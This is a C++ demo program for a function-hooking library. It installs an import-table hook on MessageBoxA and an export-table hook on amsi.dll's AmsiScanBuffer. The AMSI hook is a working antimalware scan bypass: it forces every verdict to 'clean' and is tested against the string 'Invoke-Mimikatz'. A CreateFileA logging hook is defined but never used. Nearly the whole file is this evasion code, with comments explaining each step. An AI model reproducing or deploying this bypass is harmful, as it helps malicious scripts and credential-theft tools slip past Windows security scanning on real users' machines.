#include <Windows.h>
#include <cstdio>
#include <iostream>
#include <amsi.h>
#include "Internal/LazyHook/LazyHook.hpp"
#pragma comment(lib, "amsi.lib")
// Function-pointer aliases matching the prototypes of the three APIs this file
// defines hooks for (MessageBoxA, CreateFileA, AmsiScanBuffer).
using TypeMessageBoxA = int (WINAPI*)(HWND, LPCSTR, LPCSTR, UINT);
using TypeCreateFileA = HANDLE (WINAPI*)(LPCSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
using TypeAmsiScanBuffer = HRESULT (WINAPI*)(HAMSICONTEXT, PVOID, ULONG, LPCWSTR, HAMSISESSION, AMSI_RESULT*);

// Out-slots handed to LazyHook::HookIAT / HookEAT in main() to receive the
// original function pointer; all start unset. OriginalCreateFileA is declared
// but nothing in this file installs a CreateFileA hook, so it stays null.
TypeMessageBoxA OriginalMessageBoxA{nullptr};
TypeCreateFileA OriginalCreateFileA{nullptr};
TypeAmsiScanBuffer OriginalAmsiScanBuffer{nullptr};
// Replacement for MessageBoxA installed through the IAT hook in main().
// Logs that the hook fired, then calls the real MessageBoxA via the IAT hook
// state with the caller's text and caption replaced by fixed demo strings;
// the owner window and flags are forwarded unchanged. The caller's own
// T (text) and C (caption) arguments are deliberately ignored.
// Returns whatever the original MessageBoxA returns.
int WINAPI HookMessageBoxA(HWND H, LPCSTR T, LPCSTR C, UINT U)
{
    printf("[*] MessageBoxA hooked!\n");

    const LPCSTR replacedText = "Hooked!";
    const LPCSTR replacedCaption = ">:)";
    const int choice = LazyHook::CallOriginal<int>(LazyHook::GetIatState(), H, replacedText, replacedCaption, U);
    return choice;
}
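// Replacement for CreateFileA: logs the requested path, then forwards every
// argument unchanged to the real CreateFileA through the EAT hook state and
// returns its result. Note that nothing in this file installs this hook; it
// is only defined here.
HANDLE WINAPI HookCreateFileA(LPCSTR Filename, DWORD Access, DWORD Share, LPSECURITY_ATTRIBUTES Sec, DWORD Creation, DWORD Flags, HANDLE Template)
{
    // Guard the log line: printf("%s", nullptr) is undefined behaviour, and a
    // hook must not crash the host process on an invalid argument that the
    // original function would simply reject.
    printf("[*] CreateFileA hooked: %s\n", Filename ? Filename : "(null)");
    return LazyHook::CallOriginal<HANDLE>(LazyHook::GetEatState(), Filename, Access, Share, Sec, Creation, Flags, Template);
}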
// Replacement for amsi.dll!AmsiScanBuffer installed through the EAT hook in main().
// The real scan is still performed: the call is forwarded unchanged to the
// original, so the AMSI provider still receives and processes the buffer.
// Afterwards the caller's out-parameter is overwritten with AMSI_RESULT_CLEAN,
// so only the verdict the caller sees is suppressed; the original HRESULT is
// returned as-is.
HRESULT WINAPI HookAmsiScanBuffer(HAMSICONTEXT AmsiContext, PVOID Buffer, ULONG Length, LPCWSTR ContentName, HAMSISESSION AmsiSession, AMSI_RESULT* Result)
{
printf("[*] AmsiScanBuffer hooked! Bypassing...\n");
// Forward to the genuine implementation; it fills *Result with the real verdict.
HRESULT OrgResult = LazyHook::CallOriginal<HRESULT>(LazyHook::GetEatState(), AmsiContext, Buffer, Length, ContentName, AmsiSession, Result);
// Replace the real verdict. NOTE(review): Result is dereferenced unconditionally,
// so a null Result pointer faults here regardless of what the original returned.
(*Result) = AMSI_RESULT_CLEAN;
return OrgResult;
}
// Demo driver: installs an IAT hook on this process's MessageBoxA import and an
// EAT hook on amsi.dll's AmsiScanBuffer export, exercises each once, then waits
// for a keypress and removes both hooks. Returns 0 unconditionally; hook
// failures are only reported on stdout.
int main()
{
// 1. IAT hook: redirect the MessageBoxA import from user32.dll to HookMessageBoxA.
//    The original pointer is stored in OriginalMessageBoxA via a C-style cast.
printf("[*] Installing MessageBoxA IAT hook...\n");
if (LazyHook::HookIAT("user32.dll", "MessageBoxA", HookMessageBoxA, (PVOID*)&OriginalMessageBoxA))
printf("[+] MessageBoxA hooked!\n");
// This call goes through the hooked import, so the hook's substituted
// text/caption are shown rather than "Test"/"Test".
printf("\n[*] Testing MessageBoxA...\n");
MessageBoxA(NULL, "Test", "Test", 0);
// 2. amsi.dll must be resident before its export table can be hooked.
//    The returned module handle is discarded.
printf("\n[*] Loading amsi.dll...\n");
LoadLibraryA("amsi.dll");
printf("[*] Installing AmsiScanBuffer EAT hook...\n");
if (LazyHook::HookEAT("amsi.dll", "AmsiScanBuffer", HookAmsiScanBuffer, (PVOID*)&OriginalAmsiScanBuffer))
printf("[+] AmsiScanBuffer hooked!\n");
else
printf("[-] AmsiScanBuffer hook failed!\n");
// 3. Exercise the AMSI path. NOTE(review): AmsiInitialize's HRESULT is not
//    checked; on failure AmsiContext stays nullptr and is passed to
//    AmsiScanBuffer anyway.
printf("\n[*] Testing AMSI bypass...\n");
HAMSICONTEXT AmsiContext = nullptr;
AmsiInitialize(L"TestApp", &AmsiContext);
// A sample string the author expects the provider to flag (see the printf
// below); the scan still runs in the provider, only the reported verdict is
// forced to AMSI_RESULT_CLEAN (0) by HookAmsiScanBuffer.
const char* MaliciousString = "Invoke-Mimikatz";
AMSI_RESULT ScanResult = AMSI_RESULT_CLEAN;
AmsiScanBuffer(AmsiContext, (PVOID)MaliciousString, (ULONG)strlen(MaliciousString), L"Test", NULL, &ScanResult);
printf("[*] AMSI Result: %d (0=Clean, should be clean if bypass works)\n", ScanResult);
AmsiUninitialize(AmsiContext);
// 4. Leave the hooks in place until a key is pressed, then remove both.
printf("\n[*] Press any key to unhook...\n");
getchar();
if (LazyHook::UnhookIAT())
printf("[+] IAT hook removed!\n");
if (LazyHook::UnhookEAT())
printf("[+] EAT hook removed!\n");
return 0;
}